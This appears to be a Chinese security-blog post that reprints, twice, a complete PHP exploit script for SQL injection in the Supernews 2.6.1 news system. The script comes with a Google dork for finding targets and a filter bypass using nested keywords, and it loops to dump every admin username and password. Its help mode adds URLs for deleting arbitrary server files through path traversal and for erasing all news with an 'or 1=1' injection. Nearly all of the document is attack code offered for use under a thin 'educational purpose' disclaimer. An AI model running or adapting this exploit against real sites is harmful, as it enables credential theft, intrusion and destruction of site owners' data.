Supernews 2.6.1 sql注入漏洞

/ 0评 / 0

[php]1.<?php
2.# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞
3.# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
4.# Version: 2.6.1
5.# Tested on: Debian GNU/Linux
6.7./*
8.Exploit for educational purpose only.
9.Note sent to the developer Fernando Pontes by e-mail 90@08sec.com
10.
11.SuperNews are a brazilian news system in PHP and MySQL.
12.Versions priors to 2.6 have a simple SQL Injection on view news.
13.The developer tried to fix the bug removing keywords like "union" and "select".
14.But, with a recursion, it's possible to bypass this filters. See:
15.seselectlect
16.After removing "select" word, will stay another "select" word. See more:
17.seSELECTlect
18.
19.Another SQL Injection on the administration panel:
20.When deleting a post, you can inject SQL for delete all news on the database.
21.
22.Another vulnerability allows to delete files, on the administration panel:
23.When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
24.But it's possible to delete others files, typing all the file path or using "../".
25.
26.Usage:
27.php exploit.php http://www.unhonker.com/supernews/
28.
29.For more info about vulnerabilities:
30.php exploit.php moreinfo
31.
32.Example:
33.$ php exploit.php http://www.unhonker.com/news/
34.
35.Supernews <= 2.6.1 SQL Injection Exploit
36.
37.
38.1.Trying to access server...
39.1.Detecting version... 😮
40.[!] Version: >2.6.1 🙂
41.[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
42. Type "exploit.php moreinfo" for get others vulnerabilities.
43.1.Getting user & pass 8-]
44.User: user1
45.Pass: pass1
46.
47.User: user2
48.Pass: pass2
49.
50.Good luck! 😀
51.
52.*/
53.54.error_reporting(E_ERROR);
55.set_time_limit(0);
56.@ini_set("default_socket_timeout", 30);
57.58.functionhex($string){
59. $hex=''; // PHP 'Dim' =] 60. for($i=0; $i< strlen($string); $i++){
61. $hex.= dechex(ord($string[$i]));
62. }
63. return'0x'.$hex;
64.}
65.functionstr_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
66. $count= 0;
67. $offset= strpos($haystack, $needle);
68. //If we don't replace the first, go ahead and skip it 69. if(!$replace_first) {
70. $offset+= strlen($needle);
71. $offset= strpos($haystack, $needle, $offset);
72. }
73. while($offset!== false) {
74. $haystack= substr_replace($haystack, $replace, $offset, strlen($needle));
75. $count++;
76. $offset+= strlen($replace);
77. $offset= strpos($haystack, $needle, $offset);
78. if($offset!== false) {
79. $offset+= strlen($needle);
80. $offset= strpos($haystack, $needle, $offset);
81. }
82. }
83. return$haystack;
84.}
85.functionremoveaddregex($str) {
86. returnstr_replace_every_other('(.*)', '', $str, null, false);
87.}
88.functionpreg_quote_working($str) {
89. $chars= explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
90. foreach($charsas$char) {
91. $str= str_replace($char, "\\".$char, $str);
92. }
93. return$str;
94.}
95.96.echo"\nSupernews <= 2.6.1 SQL Injection Exploit";
97.echo"\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n";
98.99.if($argc!=2) {
100. echo"Usage:
101.php $argv[0] url
102.Example:
103.php $argv[0] http://www.unhonker.com/supernews 104.php $argv[0] https://www.unhonker.com/supernews/"; 105. exit;
106.}
107.108.if($argv[1]=="moreinfo") {
109. echo"\nMore vulnerabilities:
110.- Deleting files
111. You can deletefiles on the server, after login, using the URL:
112. http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE 113. Replace \"ID\"with a valid post ID (will be deleted) andFILE with the file address on the server.
114.115.- Deleting all news on the database:
116. You can deleteall news on the database with one request, only. Look:
117. http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+ 118.119. All vulnerabilities discovered by WCGroup.\n";
120. exit;
121.}
122.123.$uri= $argv[1];
124.if(substr($uri, -1, 1)!="/") {
125. $uri.= "/";
126.}
127.$url= $uri."noticias.php?noticia=".urlencode("-1")."+";
128.echo"\n
129.1.Trying to access server..."
;
130.$accessvr= @file_get_contents($url);
131.if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
132. $url= $uri."index.php?noticia=".urlencode("-1")."+";
133.}
134.135.$token= substr(md5(chr(rand(48, 122))), 0, 10);
136.137.echo"\n
138.1.Detecting version... :-o"
;
139.140.$gettoken= strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
141.if(preg_match("/".$token."/", $gettoken)) {
142. echo"\n[!] Version: >2.6.1 :-)";
143. $version= 1;
144.} else{
145. $gettoken= strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
146. if(preg_match("/".$token."/", $gettoken)) {
147. echo"\n[!] Version =2.6.1 :-)";
148. $version= 2;
149. } else{
150. echo"\n[-] Unknown version :-S";
151. $version= 3;
152. }
153.}
154.if($version!=3) {
155. echo"\n[!] Administration panel: {$uri}admin/adm_noticias.php";
156. echo"\n Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
157. echo"\n
158.1.Getting user & pass 8-]"
;
159.}
160.161.if($version==1) {
162. $i= 0;
163. while(true) {
164. $request= strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
165. preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
166. if($get[1][0]!="") {
167. $user= $get[1][0];
168. $pass= $get[2][0];
169. echo"\nUser: $user\nPass: $pass\n";
170. $i++;
171. } else{
172. echo"\nGood luck! :-D";
173. break;
174. }
175. }
176.}
177.elseif($version==2) {
178. $i= 0;
179. while(true) {
180. $request= strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
181. preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
182. if($get[1][0]!="") {
183. $user= $get[1][0];
184. $pass= $get[2][0];
185. echo"\nUser: $user\nPass: $pass\n";
186. $i++;
187. } else{
188. echo"\nGood luck! :-D";
189. break;
190. }
191. }
192.}
193.else{
194. echo"\n\nThis site are using an unknown version of Supernews or another CMS.";
195. echo"\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
196. echo"\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
197. echo"\nIf you want, try to access manually:";
198. echo"\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
199. echo"\nWe're sorry.";
200.}
201.202.echo"\n";
203.<?php
# Exploit Title: Supernews <= 2.6.1 SQL 注入漏洞
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Version: 2.6.1
# Tested on: Debian GNU/Linux

/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail 90@08sec.com

SuperNews are a brazilian news system in PHP and MySQL.
Versions priors to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug removing keywords like "union" and "select".
But, with a recursion, it's possible to bypass this filters. See:
seselectlect
After removing "select" word, will stay another "select" word. See more:
seSELECTlect

Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL for delete all news on the database.

Another vulnerability allows to delete files, on the administration panel:
When deleting a post, a variable called "unlink" will talk to the system the new's image for delete.
But it's possible to delete others files, typing all the file path or using "../".

Usage:
php exploit.php http://www.unhonker.com/supernews/

For more info about vulnerabilities:
php exploit.php moreinfo

Example:
$ php exploit.php http://www.unhonker.com/news/

Supernews <= 2.6.1 SQL Injection Exploit

• Trying to access server...• Detecting version... 😮
[!] Version: >2.6.1 🙂
[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
Type "exploit.php moreinfo" for get others vulnerabilities.• Getting user & pass 8-]
User: user1
Pass: pass1

User: user2
Pass: pass2

Good luck! 😀

*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
$count = 0;
$offset = strpos($haystack, $needle);
//If we don't replace the first, go ahead and skip it
if (!$replace_first) {
$offset += strlen($needle);
$offset = strpos($haystack, $needle, $offset);
}
while ($offset !== false) {
$haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
$count++;
$offset += strlen($replace);
$offset = strpos($haystack, $needle, $offset);
if ($offset !== false) {
$offset += strlen($needle);
$offset = strpos($haystack, $needle, $offset);
}
}
return $haystack;
}
function removeaddregex($str) {
return str_replace_every_other('(.*)', '', $str, null, false);
}
function preg_quote_working($str) {
$chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
foreach($chars as $char) {
$str = str_replace($char, "\\".$char, $str);
}
return $str;
}

echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n";

if($argc!=2) {
echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://www.unhonker.com/supernews
php $argv[0] https://www.unhonker.com/supernews/";
exit;
}

if($argv[1]=="moreinfo") {
echo "\nMore vulnerabilities:
- Deleting files
You can delete files on the server, after login, using the URL:
http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.

- Deleting all news on the database:
You can delete all news on the database with one request, only. Look:
http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+

All vulnerabilities discovered by WCGroup.\n";
exit;
}

$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
$uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n• Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
$url = $uri."index.php?noticia=".urlencode("-1")."+";
}

$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n• Detecting version... :-o";

$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version: >2.6.1 :-)";
$version = 1;
} else {
$gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version =2.6.1 :-)";
$version = 2;
} else {
echo "\n[-] Unknown version :-S";
$version = 3;
}
}
if($version!=3) {
echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
echo "\n Type \"$argv[0] moreinfo\" for get others vulnerabilities.";
echo "\n• Getting user & pass 8-]";
}

if($version==1) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get[1][0]!="") {
$user = $get[1][0];
$pass = $get[2][0];
echo "\nUser: $user\nPass: $pass\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
}
elseif($version==2) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get[1][0]!="") {
$user = $get[1][0];
$pass = $get[2][0];
echo "\nUser: $user\nPass: $pass\n";
$i++;
} else {
echo "\nGood luck! :-D";
break;
}
}
}
else {
echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
echo "\nIf you want, try to access manually:";
echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection.";
echo "\nWe're sorry.";
}

echo "\n";

[/php]

发表评论

电子邮件地址不会被公开。 必填项已用*标注